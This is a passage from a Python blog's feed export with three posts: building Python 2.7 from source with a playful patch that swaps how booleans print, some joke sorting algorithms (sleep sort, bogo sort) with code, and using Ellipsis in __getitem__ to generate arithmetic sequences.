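<p>In the end, a Python object is a block of heap memory laid out as a C struct. This post gives a brief first look at how that is implemented.<br><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2016/07/09/987200237.png" alt="obj"></p>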
</summary>
<category term="Python" scheme="https://xlzd.me/tags/Python/"/>
</entry>
<entry>
<title>Compiling Python from Source</title>
<link href="https://xlzd.me/2016/08/22/compile-py/"/>
<id>https://xlzd.me/2016/08/22/compile-py/</id>
<published>2016-08-22T13:55:54.000Z</published>
<updated>2019-05-14T06:33:49.575Z</updated>
<content type="html"><![CDATA[<p>This is an attempt at compiling Python from source myself, on Ubuntu 14.04 LTS.</p><p><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2016/07/08/561824476.png" alt="python-back.png"></p><a id="more"></a><p>First, download the source from the official site: <a href="https://www.python.org/downloads/source/" target="_blank" rel="noopener">source downloads</a>. Once the download finishes, extract it:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tar -zxvf Python-2.7.12.tgz</span><br></pre></td></tr></table></figure></p><p>The directory structure looks like this:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">.</span><br><span class="line">├── aclocal.m4</span><br><span class="line">├── config.guess</span><br><span class="line">├── config.sub</span><br><span class="line">├── configure</span><br><span class="line">├── configure.ac</span><br><span class="line">├── Demo</span><br><span class="line">├── Doc</span><br><span class="line">├── Grammar</span><br><span class="line">├── Include</span><br><span class="line">├── install-sh</span><br><span 
class="line">├── Lib</span><br><span class="line">├── LICENSE</span><br><span class="line">├── Mac</span><br><span class="line">├── Makefile.pre.in</span><br><span class="line">├── Misc</span><br><span class="line">├── Modules</span><br><span class="line">├── Objects</span><br><span class="line">├── Parser</span><br><span class="line">├── PC</span><br><span class="line">├── PCbuild</span><br><span class="line">├── pyconfig.h.in</span><br><span class="line">├── Python</span><br><span class="line">├── README</span><br><span class="line">├── RISCOS</span><br><span class="line">├── setup.py</span><br><span class="line">└── Tools</span><br></pre></td></tr></table></figure><p>The directories we care about most are:</p><ul><li>Include: all of Python's header files.</li><li>Lib: the Python standard library, implemented in Python.</li><li>Modules: modules written in C, such as cStringIO / tkinter.</li><li>Objects: Python's built-in objects, such as int / list.</li><li>Python: the compiler and execution engine of the Python interpreter.</li><li>Parser: the scanner and parser of the Python interpreter.</li></ul><p>I want to do more than a plain build and install from source, so let's make a small change before compiling. Nothing complicated today: let's "turn black into white", that is, swap True and False when a bool is printed (and only when it is printed). The C code that prints a bool is on lines 7-14 of Objects/boolobject.c:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">static</span> <span class="keyword">int</span></span><br><span class="line">bool_print(PyBoolObject *self, FILE *fp, <span class="keyword">int</span> flags)</span><br><span class="line">{</span><br><span class="line">    Py_BEGIN_ALLOW_THREADS</span><br><span class="line">    <span class="built_in">fputs</span>(self->ob_ival == <span class="number">0</span> ? 
<span class="string">"False"</span> : <span class="string">"True"</span>, fp);</span><br><span class="line">    Py_END_ALLOW_THREADS</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>As you can see, the choice between printing True and False is made with the ternary expression <code>self->ob_ival == 0 ? "False" : "True"</code>, so the change is very easy:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fputs(self->ob_ival != 0 ? "False" : "True", fp);</span><br></pre></td></tr></table></figure><p>A small change to the comparison operator and black becomes white. Then run:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">./configure --prefix=/path/u/what/to/install</span><br><span class="line">make</span><br><span class="line">make install</span><br></pre></td></tr></table></figure></p><p>The value after <code>--prefix=</code> in the first command is the install location; adjust it as you like. When the commands finish, the installation is done. Inside the chosen directory, the layout is:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">.</span><br><span class="line">├── bin</span><br><span class="line">├── include</span><br><span class="line">├── lib</span><br><span class="line">└── share</span><br></pre></td></tr></table></figure><p>To run it, execute <code>bin/python</code>. You could also add it to your PATH, though I would not recommend interfering with the system Python. Now let's run a few statements with our own build:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">>>> print True</span><br><span class="line">False</span><br><span class="line"></span><br><span class="line">>>> print False</span><br><span class="line">True</span><br><span class="line"></span><br><span class="line">>>> print 3 > 5 </span><br><span class="line">True</span><br><span class="line"></span><br><span class="line">>>> print 1 == 2</span><br><span class="line">True</span><br></pre></td></tr></table></figure><p>Clearly, black has become white.</p>]]></content>
<summary type="html">
<p>This is an attempt at compiling Python from source myself, on Ubuntu 14.04 LTS.</p>
<p><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2016/07/08/561824476.png" alt="python-back.png"></p>
</summary>
<category term="Python" scheme="https://xlzd.me/tags/Python/"/>
</entry>
<entry>
<title>A Few Useless but Fun Sorting Algorithms</title>
<link href="https://xlzd.me/2016/07/07/sp-sort/"/>
<id>https://xlzd.me/2016/07/07/sp-sort/</id>
<published>2016-07-06T20:03:54.000Z</published>
<updated>2019-05-14T06:33:49.583Z</updated>
<content type="html"><![CDATA[<p>Common sorting algorithms, such as quicksort, heapsort and merge sort, are all comparison-based. Beyond these orthodox algorithms, I recently came across a few sorting algorithms that are equal parts funny and absurd, and I want to share them. They will almost certainly never run in production, but they are fun to pull out as a joke.</p><p><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2016/03/14/476167382.png" alt="New sorted logo.png"></p><a id="more"></a><h3 id="意大利面条排序-Spaghetti-Sort"><a href="#意大利面条排序-Spaghetti-Sort" class="headerlink" title="意大利面条排序(Spaghetti Sort)"></a>Spaghetti Sort</h3><p>The idea of spaghetti sort is to map each input value to a strand of spaghetti whose length equals the value. For the input <code>[1, 4, 2, 8, 9]</code>, for example, you prepare strands of 1cm, 4cm, 2cm, 8cm and 9cm. Align the strands at one end, hold them in your hand with the other ends pointing down, and slowly lower your hand straight down. The first strand to touch the table corresponds to the largest number, the second to touch is the second largest, and so on.</p><h3 id="睡眠排序-Sleep-Sort"><a href="#睡眠排序-Sleep-Sort" class="headerlink" title="睡眠排序(Sleep Sort)"></a>Sleep Sort</h3><p>Sleep sort can be seen as the computer implementation of spaghetti sort. For an input array <code>array</code>, start <code>array.length</code> threads, one per element. Each thread sleeps for a time proportional to its number and then reports that number. For the input <code>[1, 4, 2, 8, 9]</code> above, that means 5 threads sleeping 1s, 4s, 2s, 8s and 9s respectively (the code below scales this down to milliseconds). It is unlikely to be used in real development, but it really can be implemented in code:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># 
encoding=utf-8</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> multiprocessing.dummy <span class="keyword">import</span> Pool <span class="keyword">as</span> ThreadPool</span><br><span class="line"><span class="keyword">from</span> time <span class="keyword">import</span> sleep</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">sleep_sort</span><span class="params">(array)</span>:</span></span><br><span class="line"> rst_list = []</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">task</span><span class="params">(n)</span>:</span></span><br><span class="line"> sleep(n / <span class="number">1000.</span>)</span><br><span class="line"> rst_list.append(n)</span><br><span class="line"></span><br><span class="line"> pool = ThreadPool(len(array))</span><br><span class="line"> pool.map(task, array)</span><br><span class="line"> pool.close()</span><br><span class="line"> pool.join()</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> rst_list</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"> <span class="keyword">print</span> sleep_sort([<span class="number">10</span>, <span class="number">4</span>, <span class="number">7</span>, <span class="number">2</span>, <span class="number">1</span>, <span class="number">5</span>, <span class="number">9</span>, <span class="number">8</span>, <span class="number">3</span>, <span class="number">6</span>])</span><br></pre></td></tr></table></figure><h3 id="猴子排序-Bogo-Sort"><a href="#猴子排序-Bogo-Sort" class="headerlink" title="猴子排序(Bogo Sort)"></a>猴子排序(Bogo Sort)</h3><p> 如下关于猴子排序(Bogo Sort)的描述摘自<a 
href="https://zh.wikipedia.org/wiki/Bogo%E6%8E%92%E5%BA%8F" target="_blank" rel="noopener">Wikipedia</a>:</p><blockquote><p>In computer science, bogo sort (Bogo-Sort) is a sorting algorithm that is both impractical and primitive. It works like throwing a deck of cards into the air, checking whether they landed on the table in order, and throwing them again if they did not. Its name comes from quantum bogodynamics; it is also known as bozo sort, blort sort, or monkey sort (see the <a href="https://zh.wikipedia.org/wiki/%E7%84%A1%E9%99%90%E7%8C%B4%E5%AD%90%E5%AE%9A%E7%90%86" target="_blank" rel="noopener">infinite monkey theorem</a>).</p></blockquote><p>The <em>infinite monkey theorem</em> states that a monkey hitting typewriter keys at random for an infinite amount of time will almost surely type any given text, such as the complete works of Shakespeare.</p><p>A Python implementation of bogo sort:<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> random <span class="keyword">import</span> shuffle</span><br><span class="line"><span class="keyword">from</span> itertools <span class="keyword">import</span> tee</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">in_order</span><span class="params">(array)</span>:</span></span><br><span class="line">    it1, it2 = tee(array)</span><br><span class="line">    next(it2, <span class="keyword">None</span>)  <span class="comment"># advance the second iterator by one; safe on empty input</span></span><br><span class="line">    <span class="keyword">return</span> all(a <= b <span class="keyword">for</span> a, b <span class="keyword">in</span> zip(it1, it2))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">bogo_sort</span><span class="params">(array)</span>:</span></span><br><span class="line">    <span 
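class="keyword">while</span> <span class="keyword">not</span> in_order(array):</span><br><span class="line">        shuffle(array)</span><br><span class="line">    <span class="keyword">return</span> array  <span class="comment"># shuffled in place; returned so the caller can print it</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    <span class="keyword">print</span>(bogo_sort([<span class="number">10</span>, <span class="number">4</span>, <span class="number">1</span>, <span class="number">5</span>, <span class="number">9</span>, <span class="number">8</span>, <span class="number">3</span>, <span class="number">6</span>]))</span><br></pre></td></tr></table></figure></p><p>If the input is already sorted, bogo sort returns immediately. Otherwise its average time complexity is O(n*n!): in the best case a single shuffle is enough, but in the worst case it never terminates. So this is an algorithm to bring up when joking around; write it into real code and you can expect to get beaten up within minutes.</p><h3 id="量子猴排-Quantum-Bogo-Sort"><a href="#量子猴排-Quantum-Bogo-Sort" class="headerlink" title="量子猴排(Quantum Bogo Sort)"></a>Quantum Bogo Sort</h3><p>Quantum bogo sort can be regarded as a <u>conceptual</u> optimization of bogo sort: the shuffle is quantumly randomized. Until we observe the numbers, their state is a superposition; see <a href="https://en.wikipedia.org/wiki/Schr%C3%B6dinger%27s_cat?oldformat=true" target="_blank" rel="noopener">Schrödinger’s cat</a>. This quantum shuffle splits reality into a number of parallel universes. In some universe A, we observe the numbers, find that we were unlucky and they are not sorted, and destroy that universe. Then we check how the other universes fared. Eventually, in some universe Z, the array happens to be sorted, so we keep that universe. In the end, in every universe that was not destroyed, the array was sorted by exactly one shuffle.</p><p>The time complexity of quantum bogo sort is O(n): one shuffle plus one pass to check the order.</p><h3 id="小结"><a href="#小结" class="headerlink" title="小结"></a>Summary</h3><p>A few useless, painful, but fun sorting algorithms~~~</p>]]></content>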
<summary type="html">
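<p>Common sorting algorithms such as quicksort, heapsort, and merge sort are all comparison-based. Beyond these orthodox algorithms, I recently came across a few sorting algorithms that are hard to take seriously, and I would like to share them here. None of them is likely to ever run in production, but they are fun to pull out as a joke.</p>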
<p><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2016/03/14/476167382.png" alt="New sorted logo.png"></p>
</summary>
<category term="nonsense" scheme="https://xlzd.me/tags/nonsense/"/>
</entry>
<entry>
<title>Elegant Python: Ellipsis</title>
<link href="https://xlzd.me/2016/05/30/ellipsis/"/>
<id>https://xlzd.me/2016/05/30/ellipsis/</id>
<published>2016-05-30T01:41:55.000Z</published>
<updated>2019-05-14T06:33:49.575Z</updated>
<content type="html"><![CDATA[<p>Python is a very accommodating language: a good engineer can get a task done elegantly and efficiently with little effort, while a clumsy engineer can achieve almost the same functionality with code that looks like <del>crap</del>. Today, let's look at Python's Ellipsis~~~</p><p>Consider this problem:</p><blockquote><p>How can you elegantly generate an arithmetic sequence? For example, given the first, second, and last terms of a sequence, return the whole arithmetic sequence.</p></blockquote><a id="more"></a><p>Elegant here refers not to the implementation but to the way it is called. So before getting to the implementation, let's look at how it is called:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">In [<span class="number">1</span>]: gen = SeqGenerator()</span><br><span class="line"></span><br><span class="line">In [<span class="number">2</span>]: gen[<span class="number">1</span>, <span class="number">2</span>, ..., <span class="number">9</span>]</span><br><span class="line">[<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>, <span class="number">4</span>, <span class="number">5</span>, <span class="number">6</span>, <span class="number">7</span>, <span class="number">8</span>, <span class="number">9</span>]</span><br><span class="line"></span><br><span class="line">In [<span class="number">3</span>]: gen[<span class="number">20</span>, <span class="number">16</span>, ..., <span class="number">0</span>]</span><br><span class="line">[<span class="number">20</span>, <span class="number">16</span>, <span class="number">12</span>, <span class="number">8</span>, <span class="number">4</span>, <span class="number">0</span>]</span><br></pre></td></tr></table></figure><p>Interesting, right? Calling it in such an intuitive way is simple and clear. Now a brief look at how it works.</p><p>A class (here derived from <code>object</code>) can define a <code>__getitem__</code> method, which Python calls whenever an instance is subscripted with square brackets. You can try the following:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">In [<span class="number">1</span>]: <span class="class"><span class="keyword">class</span> <span class="title">Test</span><span class="params">(object)</span>:</span></span><br><span class="line">   ....:     <span class="function"><span class="keyword">def</span> <span class="title">__getitem__</span><span class="params">(self, item)</span>:</span></span><br><span class="line">   ....:         <span class="keyword">print</span>(item)</span><br><span class="line"></span><br><span class="line">In [<span class="number">2</span>]: t = Test()</span><br><span class="line"></span><br><span class="line">In [<span class="number">2</span>]: t[<span class="number">1</span>]</span><br><span class="line"><span class="number">1</span></span><br><span class="line"></span><br><span class="line">In [<span class="number">3</span>]: t[<span class="string">'what the fuck'</span>]</span><br><span class="line">what the fuck</span><br><span class="line"></span><br><span class="line">In [<span class="number">4</span>]: t[:]</span><br><span class="line">slice(<span class="keyword">None</span>, <span class="keyword">None</span>, <span class="keyword">None</span>)</span><br><span class="line"></span><br><span class="line">In [<span class="number">5</span>]: t[<span 
class="number">1</span>: <span class="number">10</span>]</span><br><span class="line">slice(<span class="number">1</span>, <span class="number">10</span>, <span class="keyword">None</span>)</span><br><span class="line"></span><br><span class="line">In [<span class="number">6</span>]: t[<span class="number">1</span>:<span class="number">3</span>:<span class="number">5</span>]</span><br><span class="line">slice(<span class="number">1</span>, <span class="number">3</span>, <span class="number">5</span>)</span><br><span class="line"></span><br><span class="line">In [<span class="number">7</span>]: t[<span class="number">1</span>, <span class="number">2</span>]</span><br><span class="line">(<span class="number">1</span>, <span class="number">2</span>)</span><br><span class="line"></span><br><span class="line">In [<span class="number">8</span>]: t[<span class="number">1</span>, <span class="number">2</span>, ..., <span class="number">5</span>]</span><br><span class="line">(<span class="number">1</span>, <span class="number">2</span>, <span class="built_in">Ellipsis</span>, <span class="number">5</span>)</span><br></pre></td></tr></table></figure><p>As you can see, the call at prompt <code>In [8]</code> is essentially the same as the one used above to generate the arithmetic sequence, but the result differs (<code>Test</code> does not actually return anything, it just <code>print</code>s its argument): the <code>...</code> inside the brackets arrives in the tuple as an <code>Ellipsis</code> object.</p><p>With that, the implementation of the <code>SeqGenerator</code> above becomes obvious:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">SeqGenerator</span><span class="params">(object)</span>:</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__getitem__</span><span class="params">(self, item)</span>:</span></span><br><span class="line">        <span class="keyword">if</span> <span 
class="keyword">not</span> (isinstance(item, tuple) <span class="keyword">and</span> len(item) == <span class="number">4</span> <span class="keyword">and</span> item[<span class="number">2</span>] <span class="keyword">is</span> <span class="built_in">Ellipsis</span>):</span><br><span class="line">            <span class="keyword">raise</span> RuntimeError(<span class="string">'what the fuck'</span>)</span><br><span class="line">        <span class="keyword">return</span> list(range(item[<span class="number">0</span>], (item[<span class="number">-1</span>]+<span class="number">1</span>, item[<span class="number">-1</span>]<span class="number">-1</span>)[item[<span class="number">0</span>]>item[<span class="number">1</span>]], item[<span class="number">1</span>]-item[<span class="number">0</span>]))</span><br></pre></td></tr></table></figure><p>Now you can happily call it just as in the example above. Of course, this implementation is fairly simple and does not handle every case (for example, it only accepts exactly the form first, second, <code>...</code>, last). If you like, you can sort those out yourself~~~</p>]]></content>
<summary type="html">
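<p>Python is a very accommodating language: a good engineer can get a task done elegantly and efficiently with little effort, while a clumsy engineer can achieve almost the same functionality with code that looks like <del>crap</del>. Today, let's look at Python's Ellipsis~~~</p>
<p>Consider this problem:</p>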
<blockquote>
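<p>How can you elegantly generate an arithmetic sequence? For example, given the first, second, and last terms of a sequence, return the whole arithmetic sequence.</p>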
</blockquote>
</summary>
<category term="Python" scheme="https://xlzd.me/tags/Python/"/>
</entry>
</feed>